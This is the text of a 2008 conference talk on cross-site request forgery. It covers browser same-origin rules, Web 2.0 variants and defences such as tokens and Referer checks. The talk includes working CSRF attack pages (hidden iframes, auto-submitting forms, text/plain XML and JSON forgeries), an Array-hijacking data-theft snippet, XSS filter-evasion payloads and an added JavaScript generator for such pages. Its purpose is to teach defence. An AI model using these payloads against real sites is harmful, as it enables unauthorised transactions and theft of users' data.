[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

1. Session J7 Demo: CSRF: The Biggest Little Vulnerability on the Web

2. Who Am I?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
Founder & Director – Blueinfy Solutions Pvt. Ltd.
(Brief) – SecurityExposure.com
Past experience – Net Square, Chase, IBM & Foundstone
Interest – Web security research
Published research
– Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
– Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
– Advisories – .Net, Java servers etc.
Books (Author)
– Web 2.0 Security – Defending Ajax, RIA and SOA
– Hacking Web Services
– Web Hacking
© Blueinfy Solutions Pvt. Ltd.
3. Both real and possible
It can all happen while you are browsing, without your consent:
– Bank account transfer
– Buy call for stocks
– Password change on your email account
– Placing an order on your online auction site
– ….more….

4. Myth…
We have authentication in place.
We do proper session management.
We are over SSL and entertain just POST requests.
We use a secure browser.
None of these stops CSRF: the forged request is authenticated, on a valid session, over SSL, and may well be a POST from the victim's own browser.

5. How?
All popular browsers can make cross-domain calls.
Browsers replay cookies to the same domain.
Browsers manage (and replay) HTTP authentication credentials as well.
Result: CSRF.

6. Demo
Quick look at the case of a stock trading portal: adding stocks to a portfolio ☺

7. Agenda
State of Application Security and Role of CSRF
CSRF Introduction and Cross Domain Calls
CSRF attack
CSRF and Web 2.0
Defense against CSRF
Conclusion
We will have concepts, examples and demos.
8. Application Security State
CSRF on the rise

9. Hacks & Attacks

10. Attack vectors and types
Source: Web Application Security Consortium (WASC)

11. Trends…
Server-side hacking is getting tougher with central defenses.
Attacks move to the client side – XSS and CSRF.
They help in identity stealing.
Both exploits and frameworks are available.

12. CSRF – "Sleeping giant"
"A sleeping giant is still a giant."
Entered the OWASP Top 10 and MITRE's Common Vulnerabilities and Exposures (CVE) list.
XSS and CSRF can be twin evils: having XSS, one gets CSRF for free anyway (script running on the target origin can read any anti-CSRF token and submit the request itself).
CSRF defense is difficult.

13. Real Cases and Attacks

14. Web 2.0 – Adding fuel to the fire
80% of companies are investing in Web Services as part of their Web 2.0 initiative (McKinsey 2007 Global Survey).
By the end of 2007, 30 percent of large companies had some kind of Web 2.0-based business initiative up and running (Gartner).
In 2008, Web Services or Service-Oriented Architecture (SOA) would surge ahead (Gartner).

15. Root cause of Vulnerabilities
CSI Security Survey, vulnerability distribution: 64% programming errors, 36% misconfiguration and other problems.
CSRF is somewhere in between – protocol? browser? programming?

16. CSRF – Basics

17. CSRF
Cross Site Request Forgery (CSRF), also known as XSRF.
Several other names for the same vector: "sea surf", session riding, one-click attack, etc.
The results are the same.
18. CSRF scenario
[Diagram: the web client sends a login request to the banking application; the web server (backed by the web app and DB) authenticates the user and issues a session id, SESSID=190832mkidw.]

19. CSRF scenario
[Diagram: the client requests the transaction page; the browser sends SESSID=190832mkidw and the transaction is done on that session id.]

20. CSRF scenario
[Diagram: while still holding SESSID=190832mkidw for the banking application, the client browses to a malicious site and loads a page from it.]

21. CSRF scenario
[Diagram: the page from the malicious site forces a request to the transaction page; the browser attaches SESSID=190832mkidw and the transaction is done on the victim's session.]
22. Cross Domain Call
Why do cross-domain calls work?
What about the Same Origin Policy (SOP)?
Is it a bypass of SOP? – That is what CSRF needs in order to succeed.

23. Cross Domain Access and Same Origin Policy (SOP)

24. Cross Domain
Browser & cross-domain access – an issue.
How to access cross-domain information from the browser?
Browsers follow the same origin policy. The policy protects the user against cross-site access to data (security and privacy).
Ajax and RIA brought this issue to the front end: it is important for them to access cross-domain resources.

25. Same Origin Policy
The same origin policy is followed by all browsers.
The policy dates from Netscape Navigator 2.0.
Two pages have the same origin if the protocol, port (if given), and host are the same for both pages.
document.domain – DOM reference point

26. Example
http://example.com/dir1/foo.asp
http://example.com/dir2/me.asp [Success]
https://example.com/cool.asp [Fail – protocol]
http://example.com:8080/foo.asp [Fail – port]
http://apple.com/ [Fail – host]
The origin check is done by comparing with document.domain – part of the DOM.
Note that SOP restricts reading a cross-origin response; it does not stop the browser from sending the request in the first place, which is all a one-way CSRF needs.

27. Should not work
[Diagram: the client logs in (user/pass) to the trading site trade.example.com and receives an authentication cookie; a request for the trading page that originates from a news site (cnn.com) should not work.]
28. Request generation
IMG SRC
<img src="http://host/?command">
SCRIPT SRC
<script src="http://host/?command"></script>
IFRAME SRC
<iframe src="http://host/?command"></iframe>

29. Request generation
'Image' Object
<script>
var foo = new Image();
foo.src = "http://host/?command";
</script>

30. Request generation
It is possible to generate a POST as well.
A form can be built dynamically, and the button click can be triggered from JavaScript:
<script type="text/javascript" language="JavaScript">
document.foo.submit();
</script>
31. CSRF Attack

32. Attacking with CSRF

33. Logging in
Request:
POST /trade/login.aspx HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://trade.example.com/trade/login.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

user=rob&pass=iamrob&Submit=Submit

Response:
HTTP/1.x 200 OK
Date: Mon, 23 Jul 2007 04:10:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1; path=/;
Cache-Control: private
Content-Type: text/html; charset=utf-8

34. Placing an order
GET /trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://trade.example.com/trade/trade.html
Cookie: ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1

35. Victim on another site
<html>
<head></head>
<body>
Welcome to our auction portal. We have some great products for which you can bid. <br>
Enjoy!
<iframe src='http://trade.example.com/trade/buy.aspx?symbol=GOOG&units=50' id='xsfr' name='CSRF' style="width:0px; height:0px; border: 0px"></iframe>
</body>
</html>
The browser fetches the iframe and attaches the victim's trade.example.com cookie, because cookies are selected by the target domain, not by the page that embedded the frame:
GET /trade/buy.aspx?symbol=GOOG&units=50 HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://CSRF.example.com/trade/CSRF.html
Cookie: ASP.NET_SessionId=x5r1a355eppt5k454kjmx245

36. Victim with POST request
<FORM NAME="buy" action="http://trade.example.com/trade/buy.aspx" METHOD="POST">
<input type="hidden" name="symbol" value="GOOG">
<input type="hidden" name="units" value="50">
</FORM>
<script>document.buy.submit();</script>
Resulting request:
POST /trade/buy.aspx HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://CSRF.example.com/trade/buy.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

symbol=GOOG&units=50
37. Obfuscation to bypass controls
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

38. Obfuscation to bypass controls
<SCRIPT SRC=http://url/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("XSS")`>
Image tag malformed – <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

39. Obfuscation to bypass controls
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Unicode encoding – <IMG SRC=javas cript&#58;alert&#40;'XSS')>

40. Obfuscation to bypass controls
UTF-8 – <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

41. Obfuscation to bypass controls
Hex – <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
XSS breakup – <IMG SRC="jav ascript:alert('XSS');"> (whitespace inserted inside the "javascript" keyword)
42. CSRF and Web 2.0

43. Web 2.0 and CSRF
Web 2.0 applications can be vulnerable to different types of CSRF.
It can come with different structures.
One needs to look at these as well.

44. Architecture

45. Architecture – Layers
Browser: Ajax, Flash / RIA, HTML/CSS, JavaScript, Widget, DOM
Structures: XML, JSON
Protocols: JSON-RPC, REST, XML-RPC, SOAP, HTTP(S)
Server-Side: Services, SaaS, Open APIs

46. Web 2.0 Changes – Application Infrastructure
Vector | Web 1.0 | Web 2.0
Protocols | HTTP & HTTPS | SOAP, XML-RPC, REST etc. over HTTP & HTTPS
Information structures | HTML transfer | XML, JSON, JS Objects etc.
Communication methods | Synchronous; Postback; Refresh and Redirect | Asynchronous & cross domains (proxy)
Information sharing | Single place (no urge for integration) | Multiple sources (urge for an integrated information platform)

47. Ajax/RIA call
Asynchronous JavaScript and XML
Browser side: HTML / CSS / Flash, JS / DOM, XMLHttpRequest (XHR)
Server side: Web Server, Database / Resource, XML / Middleware / Text
XHR calls are asynchronous over HTTP(S).
48. Web 2.0 Structures & Cross Domain Calls

49. Application Structures
Ajax runs with various different structures.
Developers are adding various calls and methods for it.
JavaScript can talk with back-end sources.
Mashup applications talk with various sources.
This has significant security impact.
JSON, Array, JS-Object etc.
Identification and discovery of structures, and CSRF against them.

50. CSRF with various streams
JSON, XML, JS-Script, JS-Object, JS-Array

51. Addressing Cross Domain Calls – CSRF opening
Cross-domain calls are very important for Web 2.0 applications:
– Proxy to talk with a cross domain
– Callback implementation to fetch them
– Flash via crossdomain.xml
These are types of SOP bypass and can have security implications.
Source of the information – key!

52. Cross Domain with proxy

53. Callback Implementation
• Portals like Yahoo and Google are supporting this.
• Possible to bypass the SOP and make cross-domain calls.
• Security at stake [browser layer].

54. CSRF for 2.0

55. Cross Site Request Forgery (CSRF)
What is different with Web 2.0?
– Is it possible to do CSRF to an XML stream? How?
– It will be a POST hitting the XML processing resources like Web Services.
– JSON CSRF is also possible.
– An interesting check to make against application and Web 2.0 resources.

56. One Way CSRF Scenario

57. One Way CSRF Scenario

58. One Way CSRF Scenario

59. One Way CSRF Scenario

60. One-Way CSRF
61. One-Way CSRF
<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
<input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>

62. Forcing XML
Splitting the XML stream across the form field's name and value: with ENCTYPE="text/plain" the browser sends name=value, so the "=" it inserts lands inside the XML declaration and the body arrives as well-formed XML.
Possible through XForms as well.
Similar techniques are applicable to JSON as well.

63. Similar with JSON
Target stream:
{"symbol": "MSFT", "units": "20", "comment": "none"}
<FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/trade/ajax-buy/buy.aspx" METHOD="POST">
<input type="hidden" name='{"symbol": "MSFT", "units": "20", "comment": "' value='no"}'>
</FORM>
<script>document.buy.submit();</script>
Resulting request (the "=" ends up inside the ignored comment field):
POST /trade/ajax-buy/buy.aspx HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://trade.example.com/trade/json-buy/json-CSRF.html
Content-Type: text/plain
Content-Length: 53

{"symbol": "MSFT", "units": "20", "comment": "=no"}
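As an added example (not part of the original slides), the following JavaScript generates the auto-submitting forms of slides 30, 36, 61 and 63 and reproduces the body a browser sends for ENCTYPE="text/plain", so the split point for an XML or JSON payload can be checked offline before it is ever pointed at a target. The target URLs are the talk's hypothetical trade.example.com endpoints and the payloads are constructed samples; nothing here touches a network.

```javascript
// Added example, not code from the original talk. Builds the hidden,
// self-submitting forms used for one-way CSRF and models the wire format
// of a text/plain form so the name/value split can be verified offline.
// Assumptions: the trade.example.com URLs are hypothetical; payloads are
// constructed samples.

// For enctype="text/plain" a browser serialises each field as
// name=value followed by CRLF. To deliver an arbitrary body, choose the
// split so the single '=' lands somewhere the server-side parser ignores.
function textPlainSplit(body, sacrificialField) {
  const eq = body.indexOf('=');
  if (eq !== -1) {
    // XML: the '=' inside <?xml version="1.0"?> absorbs the separator.
    return { name: body.slice(0, eq), value: body.slice(eq + 1) };
  }
  // JSON carries no '=': cut inside the value of a field the server ignores,
  // so that field receives "=..." and the important fields stay intact.
  const marker = `"${sacrificialField}": "`;
  const at = body.indexOf(marker);
  if (at === -1) throw new Error(`no "${sacrificialField}" field to absorb '='`);
  const cut = at + marker.length;
  return { name: body.slice(0, cut), value: body.slice(cut) };
}

// What the browser actually puts on the wire for a text/plain form.
function textPlainBody(fields) {
  return fields.map(({ name, value }) => `${name}=${value}\r\n`).join('');
}

// Escape for a single-quoted HTML attribute (the payloads are full of '"').
function attr(s) {
  return String(s).replace(/&/g, '&amp;').replace(/'/g, '&#39;').replace(/</g, '&lt;');
}

// The page the victim browses to: hidden form plus the script that "clicks".
function csrfFormHtml(action, method, enctype, fields) {
  const inputs = fields
    .map(f => `  <input type='hidden' name='${attr(f.name)}' value='${attr(f.value)}'>`)
    .join('\n');
  return [
    `<form name='buy' action='${attr(action)}' method='${method}' enctype='${enctype}'>`,
    inputs,
    '</form>',
    '<script>document.buy.submit();</script>',
  ].join('\n');
}

// Constructed sample payloads mirroring slides 61 and 63.
const XMLRPC_BODY =
  '<?xml version="1.0"?><methodCall><methodName>stocks.buy</methodName>' +
  '<params><param><value><string>MSFT</string></value></param>' +
  '<param><value><double>26</double></value></param></params></methodCall>';
const JSON_BODY = '{"symbol": "MSFT", "units": "20", "comment": "none"}';

// Classic urlencoded POST (slide 36): no trick needed.
function classicPostPage() {
  return csrfFormHtml('http://trade.example.com/trade/buy.aspx', 'POST',
    'application/x-www-form-urlencoded',
    [{ name: 'symbol', value: 'GOOG' }, { name: 'units', value: '50' }]);
}

// text/plain POST carrying raw XML or JSON to a non-form endpoint.
function rawBodyPostPage(action, body, sacrificialField) {
  return csrfFormHtml(action, 'POST', 'text/plain',
    [textPlainSplit(body, sacrificialField)]);
}

// Reproduces what the server will read, so the split can be checked offline.
function deliveredBody(body, sacrificialField) {
  return textPlainBody([textPlainSplit(body, sacrificialField)]);
}
```

deliveredBody(JSON_BODY, 'comment') yields the JSON with "comment": "=none", exactly the shape captured on slide 63; a parser that ignores the comment field accepts it unchanged. This is also why an endpoint that insists on Content-Type application/json or application/xml is immune to this particular trick: a plain HTML form can only send urlencoded, multipart or text/plain bodies.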
64. Two-Way CSRF
One-Way – just making a forceful request.
Two-Way:
– Reading the data coming back from the target.
– Maybe getting hold of important information – profile, statements, numbers etc.
– Is it possible with JSON/XML?

65. Two-Way CSRF

66. Two-Way CSRF

67. Two-Way CSRF
The application is serving various streams like JSON, JS-Object, Array etc.

68. Two-Way CSRF
The attacker page can make a cross-domain request using SCRIPT (Firefox).
The following code overloads the Array constructor so that elements of an array stream loaded via <script src> are handed to the attacker (uses the legacy SpiderMonkey "setter =" syntax of that era):
function Array() {
  var obj = this;
  var index = 0;
  for (j = 0; j < 4; j++) {
    obj[index++] setter = spoof;
  }
}
function spoof(x) {
  send(x.toString());
}

69. Two-Way CSRF

70. Two-Way CSRF
It is possible to overload these objects.
Reading and sending to a cross domain is possible.
This opens up a two-way channel for an attacker.
Web 2.0 streams are vulnerable to these attacks.
71. Scenario
[Diagram: the attacker posts malicious code to a blog; a vulnerable JSON feed comes through the web application's proxy from the web server (web app + DB) to the web client, which is the CSRF target.]

72. Web 2.0 Components
There are various other components of Web 2.0 applications that can serve as CSRF payload:
– RSS feeds
– Mashups
– Widgets
– Blogs
– Flash based components

73. RSS feeds
RSS feeds come into the application from various untrusted sources.
Feed readers are part of 2.0 applications.
Vulnerable to XSS or CSRF: malicious code can be executed in the browser.
Several vulnerabilities reported.

74. RSS feeds

75. Mashups
API exposure for the mashup supplier application.
Cross-domain access by callback may cause CSRF.
The mashup application sits in the middle of the data flow, so either it cannot be trusted or it must be a trusted one.

76. Widgets/Gadgets
The DOM sharing model can cause many security issues.
One widget can change information on another widget – possible.
CSRF injection through widget code.

77. Blogs
Blogs are common in Web 2.0 applications.
Many applications are plugging in third-party blogs.
One needs to check these blogs – CSRF is common with blogging applications.
78. Defense against CSRF

79. Unique tokens
URL tokens – dynamically generated
Form tokens – hidden
<input type="submit" class="submit" value="Login" />
<input type="hidden" name="formToken" value="d5cb8550af604bfb103dae89445fde69">
The token must be unpredictable, tied to the user's session, and verified on the server for every state-changing request; an attacker's page cannot read it because of the same origin policy.

80. Captchas
Image/text based captchas can be put on important forms.
This adds protection against CSRF.
Banking and financial applications can add several transaction ids for users.

81. Referer check
Checking the referrer to identify where requests are coming from.
Only same-domain requests, or requests from a specific resource, should be entertained.
Referer: http://www.google.com/
Requests that carry no Referer at all should be rejected rather than waved through: the header is easy to suppress, and failing open turns the check into no check.

82. Session and Logout
Client side – self defense:
– Log out after activities at the earliest.
– Do banking and other critical operations from a separate browser.
– Browse from a VM.
On the server side, session duration should be short.

83. Web 2.0 Specific
Server Side Checks
– Check the client's content-type.
– XHR calls – application/xml.
– Native calls – text/html.
– Filtering is possible on it.
A plain HTML form can only send application/x-www-form-urlencoded, multipart/form-data or text/plain, so an endpoint that requires application/xml or application/json cannot be reached by the text/plain form trick shown earlier.
Client Side Checks
– The stream can be started and terminated by /* or any predefined characters.
– The client can remove them before injecting into the DOM.
84. Warning
The discussed countermeasures are not bullet-proof, but they raise the bar.
There is no perfect security for CSRF – browsers are designed, and work, in a way that allows cross-site requests.
XSS on the site gives leverage for CSRF – no XSS!

85. Conclusion
CSRF is indeed a sleeping giant.
Understanding is important, and countermeasures need to be put in at code level.
No foolproof defense is available, but there are ways to protect applications or parts of applications.
Web 2.0 adds a new dimension to CSRF.

86. Questions
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
